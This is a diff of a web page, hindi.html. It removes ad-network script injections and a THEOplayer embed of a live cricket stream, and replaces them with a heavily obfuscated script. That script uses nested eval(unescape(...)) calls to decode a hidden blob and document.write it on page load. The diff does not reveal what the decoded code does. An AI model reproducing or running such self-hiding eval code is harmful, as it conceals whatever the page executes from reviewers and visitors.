--- a/hindi.html
+++ b/hindi.html
@@ -1,63 +1,16 @@
-<meta name="propeller" content="10020ec6e0fe37d1332ec9cb369fc69e">
+<html>
+<head>
+</head>
+<body>
 
-<script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://iclickcdn.com/tag.min.js',4987922,document.body||document.documentElement)</script>
-<script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://iclickcdn.com/tag.min.js',4987926,document.body||document.documentElement)</script><script type="text/javascript" src="https://cdn.jsdelivr.net/clappr/latest/clappr.min.js"></script>
-<div class="theoplayer-container video-js theoplayer-skin vjs-16-9" data-src="https://e7384f46cb09.eu-central-1.playback.live-video.net/api/video/v1/eu-central-1.922366157501.channel.GOtmfkLbP0bY.m3u8" data-poster="https://i.ibb.co/Qjhmhy7/LSG-vs-CSK-Match-Prediction-1260x657.jpg"></div>
-<script>
-  var element, player;
-
-  function createPlayer() {
-    element = document.querySelector('.theoplayer-container');
-    player = new THEOplayer.Player(element, {
-      libraryLocation: 'https://cdn.myth.theoplayer.com/55d71743-4924-4d1b-8440-78f9cd103879/'
-    });
-    player.preload = "auto";
-  }
-
-  function setSrc(src, poster) {
-    if (!player) {
-      createPlayer();
-    }
-    player.source = {
-      "sources": {
-        "src": src
-      },
-      "poster": poster
-    }
-  }
-  window.addEventListener('theoplayerready', function() {
-    if (!player) {
-      createPlayer();
-    }
-  })
-  document.addEventListener("DOMContentLoaded", function() {
-    var players = [].slice.call(document.querySelectorAll(".theoplayer-container"));
-    if ("IntersectionObserver" in window) {
-      var playerObserver = new IntersectionObserver(function(entries, observer) {
-        entries.forEach(function(container) {
-          if (container.isIntersecting) {
-            var src = container.target.dataset.src
-            var poster = container.target.dataset.poster;
-            if (!window.THEOplayer) {
-              window.addEventListener('theoplayerready',
-                function() {
-                  setSrc(src, poster);
-                })
-            } else {
-              setSrc(src, poster);
-            }
-            playerObserver.unobserve(container.target);
-          }
-        });
-      });
-      players.forEach(function(playerElement) {
-        playerObserver.observe(playerElement);
-      });
-    }
-  });
+<script type="text/javascript">
+<!-- 
+eval(unescape('%66%75%6e%63%74%69%6f%6e%20%68%36%37%37%62%36%63%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%32%34%31%39%35%35%38%30%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%37%33%31%38%30%32%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%37%29%3b%0a%09%7d%0a%09%72%65%74%75%72%6e%20%72%3b%0a%7d%0a'));
+eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%68%36%37%37%62%36%63%28%27') + '%36%67%5d%68%5d%1d%6f%5d%65%5f%3e%1b%6b%68%69%6a%5b%62%61%56%6c%18%18%54%68%65%6e%5f%64%68%31%1f%22%2e%2a%2a%21%5e%5e%2c%5f%2a%5a%59%28%38%5a%29%2d%24%2b%5c%5f%33%5f%5e%2b%2b%3a%58%5f%2e%3a%5e%19%34%07%00%03%04%31%64%5b%68%63%61%6d%35%22%5e%6d%62%5b%69%6a%6f%64%20%64%25%6c%26%72%26%6c%25%70%64%20%6f%6a%54%36%6c%26%6d%24%69%59%69%32%6a%6e%6a%6a%5b%6c%6e%5f%22%25%5a%5e%65%5d%25%72%60%67%5c%23%24%70%27%22%6d%2f%5d%6a%68%56%67%5f%3f%60%61%60%5a%25%64%25%37%77%2a%21%5f%6b%5d%6d%63%59%63%65%20%5f%6a%56%5a%6f%5d%3f%66%5b%61%5a%6f%6a%22%21%64%5c%69%61%68%6e%25%25%21%28%66%6e%6c%61%6c%31%2b%29%61%59%62%66%54%63%5f%5c%6f%27%5e%6b%67%2b%68%5d%64%2f%61%61%66%2f%63%6e%23%24%2e%37%36%34%3a%2c%28%24%55%68%5e%6d%67%5d%62%6a%23%53%6f%5e%73%7d%75%5f%6b%5d%6d%63%59%63%65%20%5e%69%54%6e%64%5d%66%6e%3b%62%5a%6e%59%64%6c%2a%35%2a%6f%5d%68%67%6e%69%3f%01%00%34%64%5c%69%61%68%6e%32%26%5b%66%60%5f%6c%6a%68%65%22%6d%26%6b%22%77%2d%6e%21%75%64%27%6e%68%5d%35%6b%22%68%2f%6b%5d%6c%32%6d%6f%68%63%58%6b%6a%5a%29%27%5e%5b%65%5a%24%70%69%64%5b%27%21%7b%25%26%68%2f%5a%6b%6a%5f%64%58%3b%65%6a%62%5e%20%64%22%36%75%23%22%58%6f%58%66%61%5d%66%65%27%5e%68%5f%59%68%59%3a%6d%59%65%5f%6f%6d%23%23%6d%5f%6e%65%6d%65%27%21%24%28%61%6f%6e%68%6f%36%2f%2c%6a%5b%66%63%54%64%5e%5e%66%24%59%6f%62%20%6a%59%61%2f%66%60%64%26%60%69%27%21%25%35%32%31%3a%2b%2d%26%5c%6b%59%69%62%56%60%6e%26%53%68%5f%71%74%76%58%6f%58%66%61%5d%66%65%27%5f%6b%5d%6d%63%59%63%65%39%66%5f%6e%5e%65%6e%23%36%2d%6b%58%63%65%6a%6c%3f%35%6e%5f%6a%61%6c%6a%1d%65%75%6a%5f%3e%1b%6f%5d%70%6e%2d%64%5e%67%5d%6f%5d%63%62%6b%6e%1a%1a%69%6c%58%3e%1c%62%6c%65%69%6e%30%29%2b%59%5a%63%2f%64%6f%5c%56%65%60%6c%6a%24%62%59%69%20%5b%66%5b%61%69%69%2b%64%59%68%59%68%65%2f%5f%64%52%69%6b%68%26%65%67%60%23%6b%6b%18%36%3d%28%6e%5f%6a%61%6c%6a%33%0e%04%36%5c%6a%6f%1b%5f%64%59%69%6b%32%13%6a%62%5f%60%69%67%59%73%5d%6e%21%58%60%60%6e%5b%6a%67%5c%68%18%6c%67%5a%5a%60%21%60%6d%11%6d%63%5d%69%6a%60%5d%76%56%6c%25%6d%6c%62%65%1a%6e%60%69%21%2e%27%21%31%1a%11%5d%58%6e%5b%25%69%6c%58%3e%1c%62%6c%65%69%6e%30%29%2b%5b%37%28%39%2a%5c%2c%27%5c%59%2a%33%24%5b%69%22%54%59%64%6c%63%5a%67%25%2b%24%6c%62%5e%7a%5c%59%5d%6c%27%67%61%6e%5d%23%68%66%55%59%6b%26%6f%5e%6f%2b%5b%6a%67%2f%6b%6a%5a%5d%69%20%6f%28%2b%5f%6d%23%5b%5a%6f%6a%68%5b%6d%26%28%24%33%28%2e%2b%2b%27%2d%2d%31%26%29%28%24%5d%62%5f%60%63%56%62%24%41%40%6d%64%5c%65%46%5e%4e%2d%53%55%24%67%24%6e%33%18%18%5e%5f%6a%5e%2e%6e%6b%6d%65%5e%69%35%1a%62%68%6a%6d%64%34%2b%29%6a%27%60%58%5a%24%59%6f%2c%42%64%62%67%69%72%32%2b%44%4f%45%21%6b%64%21%3f%4d%4c%26%44%59%6c%5f%64%21%4d%63%59%5e%63%54%6d%60%6b%66%25%2f%2c%2b%21%76%2c%2f%38%27%61%6a%61%18%32%32%2c%55%65%6c%36%0e%03%37%6f%5d%68%67%6e%69%3f%01%00%18%11%6f%58%68%18%5d%60%59%62%56%60%6e%24%11%69%67%59%73%5d%6e%33%02%0b%01%00%18%11%5f%6c%64%5d%6e%67%6f%63%11%5b%68%5f%52%6d%5c%4a%64%59%77%59%6f%29%25%1a%75%0e%03%1b%1a%18%1a%5b%62%5a%6e%59%64%6c%11%36%1b%5e%69%5f%6b%61%5a%6f%6a%24%6b%66%5e%69%71%4d%5d%60%59%58%65%6f%68%20%28%27%6f%62%5f%6b%6c%62%5e%7a%59%68%27%54%68%65%6e%5b%61%62%59%6f%28%25%37%07%0b%19%1b%1a%18%6a%60%5d%76%56%6c%1a%37%11%67%5c%73%18%4e%44%39%4c%61%62%59%73%56%6b%25%4a%64%59%77%59%6f%29%59%66%5f%6e%5e%65%6e%24%1a%71%01%07%11%1e%1a%18%11%19%67%61%5a%68%5f%6c%76%4d%6f%5f%5b%65%62%6a%64%32%1a%25%66%69%65%6e%6f%32%20%28%5e%5e%66%24%63%75%69%69%20%6e%60%56%68%6b%66%5b%71%5b%6c%23%54%6f%65%29%26%2e%5f%33%2b%33%28%2b%22%25%35%28%2c%2e%2d%5f%29%5a%25%34%2a%29%21%21%33%30%57%32%5e%5e%2b%2a%29%36%34%3a%2f%23%07%0b%19%1b%1a%18%75%27%33%02%0b%1e%1a%18%11%69%67%59%73%5d%6e%20%6d%63%59%66%69%52%5d%1b%35%18%18%5f%69%69%60%1c%37%07%0b%19%1b%75%07%00%03%04%1d%11%58%6d%66%54%6d%60%6b%66%1a%69%59%69%44%6c%5f%20%64%6b%5e%26%18%6a%6d%6b%69%56%6c%21%18%7c%06%01%1a%18%1a%1c%65%5b%11%26%19%68%6d%5a%70%5d%6a%21%1c%73%02%0b%1e%1a%18%11%19%1b%5f%6a%5d%5f%6a%5a%41%62%59%73%56%6b%23%21%35%05%06%1e%1d%11%1e%75%07%0b%19%1b%1a%18%6a%60%5d%76%56%6c%24%6d%60%6e%69%5f%5f%1a%33%1e%70%0e%04%1a%18%11%19%1b%1a%1a%6f%6d%69%6f%54%59%6f%1a%3b%19%76%05%02%1a%1c%1e%1d%11%1e%1a%18%13%6c%69%5f%1a%30%1c%6b%6f%54%01%00%18%11%19%1b%1a%18%75%20%01%07%11%1e%1a%18%11%19%19%6a%69%6f%68%59%6f%13%34%1a%68%60%6c%6f%5d%6a%05%06%1e%1d%11%1e%75%07%0b%19%1b%75%07%00%1c%1e%74%6a%60%5e%69%78%27%58%5e%5c%3d%6a%59%63%65%42%61%6d%65%5e%65%5d%6a%22%25%6a%65%56%6f%6a%64%52%72%5c%68%6a%5d%5f%5a%76%28%22%1a%5e%66%67%5e%6e%63%6b%62%26%26%11%73%05%02%11%19%1b%1a%63%5c%1c%26%1e%61%62%59%73%56%6b%20%1a%75%05%06%1e%1d%11%1e%1a%18%54%6b%5c%59%6c%5d%4c%62%5e%7a%59%68%20%2a%34%04%00%18%1a%1c%1e%72%0e%04%1a%18%7e%22%04%00%18%1a%58%6f%58%66%61%5d%66%65%27%58%5e%5c%3d%6a%59%63%65%42%61%6d%65%5e%65%5d%6a%22%1e%3a%4c%4e%3b%6b%66%65%5e%65%6e%44%6b%5f%5a%5a%55%1c%26%18%57%6e%65%5f%6c%61%6d%60%25%2a%1e%77%07%0b%19%1b%1a%18%6c%5f%6c%1d%61%62%59%73%56%6b%6e%1a%37%1a%51%51%23%64%62%61%5d%56%27%5e%59%64%66%24%5a%6c%54%69%65%5f%6f%6d%25%69%6f%5d%6e%75%48%56%62%5d%5d%65%68%69%39%64%66%24%1c%23%65%66%5d%69%61%65%58%71%5f%68%23%5b%6c%6f%6a%59%63%6f%5e%69%18%23%21%31%01%07%11%1e%1a%18%6a%5f%1b%22%1a%41%62%6a%5a%63%6b%5d%5d%65%62%6a%64%49%58%69%59%6f%67%59%68%1a%11%62%65%1a%71%61%62%5a%6c%78%25%1a%75%0e%03%1b%1a%18%1a%1c%1e%6b%52%6c%1a%68%6d%5a%70%5d%6a%4b%5e%6b%5a%63%68%5d%6a%11%36%1b%64%5f%73%1c%45%63%65%59%68%6d%56%5c%6f%61%69%64%4d%5c%68%56%6c%6c%5f%63%21%5d%6d%66%5f%68%65%6c%6f%26%5d%66%65%6b%60%5d%6d%26%1c%6f%5f%64%59%68%6e%56%6b%20%1a%75%05%06%1e%1d%11%1e%1a%18%11%19%5c%64%6c%68%67%59%68%2f%58%6b%6a%36%5a%5e%62%20%5c%6b%60%58%65%65%6b%66%29%5c%6a%64%6c%59%67%60%5a%63%25%1a%75%0e%03%1b%1a%18%1a%1c%1e%1d%11%1e%1a%63%57%19%23%5f%69%64%68%5d%66%6f%59%68%26%6a%6c%40%64%6c%5d%6e%6b%5a%54%6a%61%66%68%22%1b%77%07%00%1c%1e%1d%11%1e%1a%18%11%19%1b%1a%18%6c%5f%6c%1d%64%6c%5f%18%3e%19%5e%6b%66%6e%5f%65%63%56%6c%24%6c%52%6b%62%5d%6c%24%58%5d%69%52%6b%5d%6c%2f%6c%69%5f%07%00%1c%1e%1d%11%1e%1a%18%11%19%1b%1a%18%6c%5f%6c%1d%61%6f%6f%6c%56%6b%1b%35%18%5f%6d%60%69%52%65%64%5f%63%27%6f%59%6a%63%5b%6a%23%55%5d%6e%5b%64%5e%6f%24%68%6b%69%6a%5a%63%33%05%02%11%19%1b%1a%18%1a%1c%1e%1d%11%1e%1a%63%57%19%23%19%71%61%62%5a%6c%78%20%4e%40%36%48%6b%66%5b%71%5b%6c%26%11%73%05%02%11%19%1b%1a%18%1a%1c%1e%1d%11%1e%1a%18%11%70%60%64%5c%6b%75%20%5e%55%5a%3d%6e%56%67%6f%46%63%6f%68%59%63%56%6c%22%21%65%61%5c%6b%68%66%5f%75%5a%63%6c%5d%5b%55%72%22%26%07%00%1c%1e%1d%11%1e%1a%18%11%19%1b%1a%18%1a%1c%1e%1d%57%69%64%5d%65%62%6a%64%20%21%1c%73%02%0b%1e%1a%18%11%19%1b%1a%18%1a%1c%1e%1d%11%1e%1a%18%11%19%6e%5d%6c%4f%6e%5b%25%64%6c%5f%24%11%69%6a%6f%6c%5d%6e%25%30%0e%04%1a%18%11%19%1b%1a%18%1a%1c%1e%1d%11%1e%1a%18%11%76%20%05%02%1a%1c%1e%1d%11%1e%1a%18%11%19%1b%1a%77%1a%5b%62%68%56%1e%77%07%0b%19%1b%1a%18%1a%1c%1e%1d%11%1e%1a%18%11%19%6e%5d%6c%4f%6e%5b%25%64%6c%5f%24%11%69%6a%6f%6c%5d%6e%25%30%0e%04%1a%18%11%19%1b%1a%18%1a%1c%1e%1d%11%71%05%02%11%19%1b%1a%18%1a%1c%1e%1d%11%1e%1a%68%6d%5a%70%5d%6a%4b%5e%6b%5a%63%68%5d%6a%2f%6e%65%6b%5a%6f%5b%6c%6b%56%26%5f%69%6f%6d%58%61%66%5d%6e%20%69%52%6c%63%5f%65%22%36%05%02%1a%1c%1e%1d%11%1e%1a%18%11%19%74%05%02%1a%1c%1e%1d%11%1e%1a%18%7e%22%36%05%02%1a%1c%1e%1d%11%1e%75%23%3c%06%01%1a%18%1a%1c%1e%1d%61%62%59%73%56%6b%6e%24%5e%6b%6e%39%5e%54%66%22%5e%66%67%5e%6e%63%6b%62%26%6d%6d%5d%71%5f%63%3e%67%5d%67%5d%62%6a%26%11%73%05%02%11%19%1b%1a%18%1a%1c%1e%6d%6d%5d%71%5f%63%48%59%6f%5f%68%6a%59%6f%2f%6f%58%6d%56%6b%6d%5d%20%6a%60%5d%76%56%6c%3d%64%56%66%5c%64%6c%21%31%01%07%11%1e%1a%18%11%19%74%21%35%05%06%1e%1d%11%1e%75%07%0b%19%1b%75%23%37%03%04%31%20%6b%5f%6a%6a%69%6f%34%07%00%30%6b%58%63%65%6a%6c%11%5a%6e%71%66%5f%1c%6b%6f%54%31%18%60%65%6d%6b%6f%32%2b%2d%5b%59%6f%20%65%73%65%61%25%6e%60%5d%6d%6e%61%52%75%5d%6a%2f%5c%6a%65%29%2d%2b%5a%34%22%37%2e%2d%2e%2d%30%28%2c%25%28%5a%2e%53%21%32%2c%25%29%24%33%30%5c%37%5b%59%22%2e%2f%30%38%32%2a%4e%40%3d%4d%6e%61%52%75%5d%6a%2f%63%6e%18%36%36%2d%6b%58%63%65%6a%6c%3f%06%01%36%64%61%62%63%1d%63%59%66%37%13%6c%6f%71%64%5d%69%66%5a%56%6a%18%18%65%72%6b%5d%37%18%68%59%75%65%2f%5f%6d%64%1b%1b%62%6a%5d%5a%31%24%69%6a%6e%68%64%33%2a%2b%5d%5e%62%20%62%7a%6a%62%26%65%61%5c%6b%68%66%5f%75%5a%63%20%5f%69%6e%28%2c%2d%5c%33%2f%37%29%24%21%2e%33%23%2d%24%2e%5c%29%5e%21%35%25%2a%2a%27%38%31%5d%31%5d%5e%2f%2e%28%39%37%31%29%66%62%25%5f%6d%6f%25%30%02%0b%32%6f%5d%63%62%6b%6e%36%22%5a%69%63%54%6a%61%69%6f%21%6e%26%6f%26%76%22%6d%2a%73%6f%26%64%6b%5e%35%6f%26%69%20%68%56%6a%39%6c%65%6b%60%58%6f%6e%5b%26%24%55%5d%6e%5b%2e%73%6a%64%5f%23%20%74%26%2d%6e%24%5b%61%69%5c%64%5c%3f%64%65%61%55%26%6f%23%3c%76%20%22%5c%6b%59%69%62%56%60%6e%26%54%6b%5c%59%6c%5d%3b%62%5a%6e%59%64%6c%29%20%6e%5f%6a%61%6c%6a%24%2a%22%23%60%65%6d%6b%6f%32%2b%2d%65%58%6d%65%5f%65%54%5d%65%24%5d%6b%63%2f%69%52%67%24%67%6a%67%25%60%6d%23%20%2a%36%39%37%31%2a%23%25%5f%6b%5d%6d%63%59%63%65%20%58%69%55%72%77%76%5c%6b%59%69%62%56%60%6e%26%55%68%5e%6d%67%5d%62%6a%3a%6d%59%65%5f%6f%6d%20%36%29%6f%59%6c%66%61%6a%34%07%0b%35%6e%5f%6a%61%6c%6a%33%29%58%6d%66%54%6d%60%6b%66%22%69%22%6a%2d%74%26%68%2a%74%6e%24%6d%68%59%31%6a%2d%6b%24%6d%56%6d%38%6e%6c%68%67%5c%6a%65%59%22%21%55%5a%6f%59%27%70%6d%60%5a%28%22%70%23%2d%69%25%59%68%6a%5b%60%59%34%66%61%64%55%21%6e%21%35%75%27%26%59%60%5b%6d%67%56%67%6f%24%5d%68%5b%5d%69%56%39%66%5f%6e%5e%65%6e%20%23%69%5b%6f%6a%6e%6e%21%2a%25%22%62%6c%6e%6c%6b%37%20%2f%61%5d%6d%62%5e%67%5d%5e%62%20%58%60%61%2b%6c%52%60%25%65%63%64%22%64%68%28%22%2e%33%39%30%30%28%2e%26%58%6f%58%66%61%5d%66%65%27%59%6b%5c%71%70%72%59%60%5b%6d%67%56%67%6f%24%5c%6b%59%69%62%56%60%6e%3f%6d%5e%64%5d%66%6e%27%32%2c%64%5b%68%63%61%6d%3524195580%33%31%33%35%37%34%38' + unescape('%27%29%29%3b'));
+// -->
 </script>
-<script async src="https://cdn.myth.theoplayer.com/55d71743-4924-4d1b-8440-78f9cd103879/THEOplayer.js"></script>
-<link rel="stylesheet" type="text/css" href='https://cdn.myth.theoplayer.com/55d71743-4924-4d1b-8440-78f9cd103879/ui.css'>
-<script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://iclickcdn.com/tag.min.js',4987922,document.body||document.documentElement)</script>
-<script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://iclickcdn.com/tag.min.js',4987926,document.body||document.documentElement)</script>
+<noscript><i>Javascript required</i></noscript>
+
+</body>
+</html>
 
